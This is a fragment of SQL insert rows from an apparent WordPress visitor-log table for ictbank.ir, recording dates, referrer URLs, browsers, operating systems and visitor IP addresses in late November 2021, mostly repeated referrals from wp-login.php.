(16134,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.110.88','000',0,1,0),
(16135,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.185.49','000',0,1,0),
(16136,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.159.131','000',0,1,0),
(16137,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.163.0','000',0,1,0),
(16138,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.62.118','000',0,1,0),
(16139,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.146.37','000',0,1,0),
(16140,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.93.235','000',0,1,0),
(16141,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.80.237','000',0,1,0),
(16142,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.247.73','000',0,1,0),
(16143,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.89.103','000',0,1,0),
(16144,'2021-11-26','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','188.124.205.230','000',0,1,0),
(16145,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.133.26','000',0,1,0),
(16146,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.105.8','000',0,1,0),
(16147,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.87.47','000',0,1,0),
(16148,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.31.59','000',0,1,0),
(16149,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.189.80','000',0,1,0),
(16150,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.207.83','000',0,1,0),
(16151,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.173.220','000',0,1,0),
(16152,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.206.233','000',0,1,0),
(16153,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.136.161.209','000',0,1,0),
(16154,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.83.187','000',0,1,0),
(16155,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.155.94','000',0,1,0),
(16156,'2021-11-26','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.141.198','000',0,1,0),
(16157,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.92.122','000',0,1,0),
(16158,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.101.193','000',0,1,0),
(16159,'2021-11-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,10,0),
(16160,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.246.129','000',0,1,0),
(16161,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.207.23','000',0,1,0),
(16162,'2021-11-27','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.163','000',0,1,0),
(16163,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.13.123','000',0,1,0),
(16164,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.183.142','000',0,1,0),
(16165,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.130.187','000',0,1,0),
(16166,'2021-11-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.118','000',0,6,0),
(16167,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.70.117','000',0,1,0),
(16168,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.8.58','000',0,1,0),
(16169,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.54.246','000',0,1,0),
(16170,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.34.84','000',0,1,0),
(16171,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.231.131','000',0,1,0),
(16172,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.100.72','000',0,1,0),
(16173,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.158.62','000',0,1,0),
(16174,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.156.111','000',0,2,0),
(16175,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.189.180','000',0,1,0),
(16176,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.172.93','000',0,1,0),
(16177,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.65.71','000',0,1,0),
(16178,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.197.163','000',0,1,0),
(16179,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.107.71','000',0,1,0),
(16180,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.131.95','000',0,1,0),
(16181,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.196.77','000',0,1,0),
(16182,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.87.140','000',0,1,0),
(16183,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.6.118','000',0,1,0),
(16184,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.79.244','000',0,1,0),
(16185,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.215.65','000',0,1,0),
(16186,'2021-11-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(16187,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.1.219','000',0,1,0),
(16188,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.134.47','000',0,1,0),
(16189,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.126.110','000',0,1,0),
(16190,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.219.219','000',0,1,0),
(16191,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.139.232','000',0,1,0),
(16192,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.34.148','000',0,1,0),
(16193,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.208.18','000',0,1,0),
(16194,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.225.34.167','000',0,1,0),
(16195,'2021-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.102.70.192','000',0,5,0),
(16196,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.60.134','000',0,1,0),
(16197,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.125.52','000',0,1,0),
(16198,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.208.156','000',0,1,0),
(16199,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.196.220','000',0,1,0),
(16200,'2021-11-27','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','37.46.121.225','000',0,5,0),
(16201,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.180.96','000',0,1,0),
(16202,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.211.43','000',0,1,0),
(16203,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.215.25','000',0,1,0),
(16204,'2021-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','41.75.187.106','000',0,1,0),
(16205,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.252.63','000',0,1,0),
(16206,'2021-11-27','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','176.106.246.67','000',0,1,0),
(16207,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.153.137','000',0,1,0),
(16208,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.188.28','000',0,1,0),
(16209,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.72.231','000',0,1,0),
(16210,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.150.58','000',0,1,0),
(16211,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.218.93','000',0,1,0),
(16212,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.61.160','000',0,1,0),
(16213,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.250.192','000',0,1,0),
(16214,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.224.24','000',0,1,0),
(16215,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.114.190','000',0,1,0),
(16216,'2021-11-27','https://www.bing.com','Chrome','Windows','6.1',NULL,NULL,'','143.198.30.100','000',0,1,0),
(16217,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.43.117','000',0,1,0),
(16218,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.21.247','000',0,1,0),
(16219,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.51.78','000',0,1,0),
(16220,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.235.81','000',0,1,0),
(16221,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.204.152','000',0,1,0),
(16222,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.156.46','000',0,1,0),
(16223,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.155.51','000',0,1,0),
(16224,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.157.237','000',0,1,0),
(16225,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.139.53','000',0,1,0),
(16226,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.86.29','000',0,1,0),
(16227,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.184.81','000',0,1,0),
(16228,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.171.89','000',0,1,0),
(16229,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.9.212','000',0,1,0),
(16230,'2021-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.24.27','000',0,2,0),
(16231,'2021-11-27','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','212.102.35.151','000',0,2,0),
(16232,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.18.103.211','000',0,1,0),
(16233,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.245.135','000',0,1,0),
(16234,'2021-11-27','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','151.239.46.161','000',0,1,0),
(16235,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.222.152','000',0,1,0),
(16236,'2021-11-27','http://design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','95.181.152.179','000',0,3,0),
(16237,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.85.189','000',0,1,0),
(16238,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.154.137','000',0,1,0),
(16239,'2021-11-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(16240,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.206.166','000',0,1,0),
(16241,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.96.113','000',0,1,0),
(16242,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.188.65','000',0,1,0),
(16243,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.166.143','000',0,1,0),
(16244,'2021-11-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.180.231.247','000',0,2,0),
(16245,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.154.53','000',0,1,0),
(16246,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.85.135.113','000',0,1,0),
(16247,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.99.180','000',0,1,0),
(16248,'2021-11-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.148.145.14','000',0,2,0),
(16249,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.18.70','000',0,1,0),
(16250,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.187.176','000',0,1,0),
(16251,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.57.163','000',0,1,0),
(16252,'2021-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.230.120','000',0,1,0),
(16253,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.206.123.220','000',0,1,0),
(16254,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.71.85','000',0,1,0),
(16255,'2021-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.172.27.195','000',0,2,0),
(16256,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.203.193','000',0,1,0),
(16257,'2021-11-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(16258,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.86.219.228','000',0,1,0),
(16259,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.196.129','000',0,1,0),
(16260,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.88.39','000',0,1,0),
(16261,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.156.32','000',0,1,0),
(16262,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.238.148','000',0,1,0),
(16263,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.234.102','000',0,1,0),
(16264,'2021-11-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(16265,'2021-11-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.60.133','000',0,1,0),
(16266,'2021-11-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(16267,'2021-11-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(16268,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.35.195','000',0,2,0),
(16269,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.24.130','000',0,1,0),
(16270,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.0.200','000',0,1,0),
(16271,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.171.213','000',0,1,0),
(16272,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.184.90','000',0,1,0),
(16273,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.212.222','000',0,1,0),
(16274,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.190.228','000',0,1,0),
(16275,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.230.1','000',0,1,0),
(16276,'2021-11-27','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.46.194','000',0,1,0),
(16277,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.98.83','000',0,1,0),
(16278,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.13.156','000',0,3,0),
(16279,'2021-11-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(16280,'2021-11-28','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.92.13','000',0,1,0),
(16281,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.215.202','000',0,1,0),
(16282,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.193.239','000',0,1,0),
(16283,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.91.165','000',0,1,0),
(16284,'2021-11-28','http://design-arena.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','84.247.48.57','000',0,3,0),
(16285,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.23.183','000',0,1,0),
(16286,'2021-11-28','http://ictbank.ir/','Chrome','Windows','6.3',NULL,NULL,'','176.106.246.67','000',0,1,0),
(16287,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.120.151','000',0,1,0),
(16288,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.23.95','000',0,1,0),
(16289,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.157.240','000',0,1,0),
(16290,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.12.132.48','000',0,1,0),
(16291,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.134.222','000',0,1,0),
(16292,'2021-11-28','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','131.129.65.159','000',0,1,0),
(16293,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.113.115','000',0,1,0),
(16294,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.136.102','000',0,1,0),
(16295,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.170.225','000',0,1,0),
(16296,'2021-11-28','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.66','000',0,8,0),
(16297,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.217.189','000',0,1,0),
(16298,'2021-11-28','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','194.104.136.109','000',0,3,0),
(16299,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.59.244','000',0,1,0),
(16300,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.68.119','000',0,1,0),
(16301,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.238.148','000',0,1,0),
(16302,'2021-11-28','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','64.124.51.154','000',0,2,0),
(16303,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.126.110','000',0,1,0),
(16304,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.186.171','000',0,1,0),
(16305,'2021-11-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(16306,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.175.93','000',0,1,0),
(16307,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.191.133','000',0,1,0),
(16308,'2021-11-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.43.42.112','000',0,2,0),
(16309,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.105.56','000',0,1,0),
(16310,'2021-11-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(16311,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.216.64','000',0,1,0),
(16312,'2021-11-28','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','185.128.26.101','000',0,5,0),
(16313,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.36.28','000',0,1,0),
(16314,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.48.145','000',0,1,0),
(16315,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.152.50','000',0,1,0),
(16316,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.31.66','000',0,1,0),
(16317,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.5.130','000',0,1,0),
(16318,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.21.121','000',0,1,0),
(16319,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.127.89','000',0,2,0),
(16320,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.102.254','000',0,1,0),
(16321,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.130.160','000',0,1,0),
(16322,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.245.123','000',0,1,0),
(16323,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.1.219','000',0,1,0),
(16324,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.36.78','000',0,1,0),
(16325,'2021-11-28','https://webtechsurvey.com/website/design-arena.ir','Chrome','Windows','10.0',NULL,NULL,'','45.72.48.130','000',0,2,0),
(16326,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.208.58','000',0,2,0),
(16327,'2021-11-28','http://design-arena.ir/blog','Safari','OS X','10.13',NULL,NULL,'','135.181.109.238','000',0,2,0),
(16328,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.31.61','000',0,1,0),
(16329,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.197.162','000',0,2,0),
(16330,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.199.129','000',0,1,0),
(16331,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.83.76','000',0,1,0),
(16332,'2021-11-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.44','000',0,2,0),
(16333,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.84.214','000',0,1,0),
(16334,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.204.44','000',0,1,0),
(16335,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.92.146','000',0,1,0),
(16336,'2021-11-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.223.223.114','000',0,1,0),
(16337,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.172.192','000',0,1,0),
(16338,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.118.87','000',0,1,0),
(16339,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.230.192','000',0,1,0),
(16340,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.228.249','000',0,1,0),
(16341,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.93.145','000',0,1,0),
(16342,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.76.172','000',0,1,0),
(16343,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.196.131','000',0,1,0),
(16344,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.234.4','000',0,1,0),
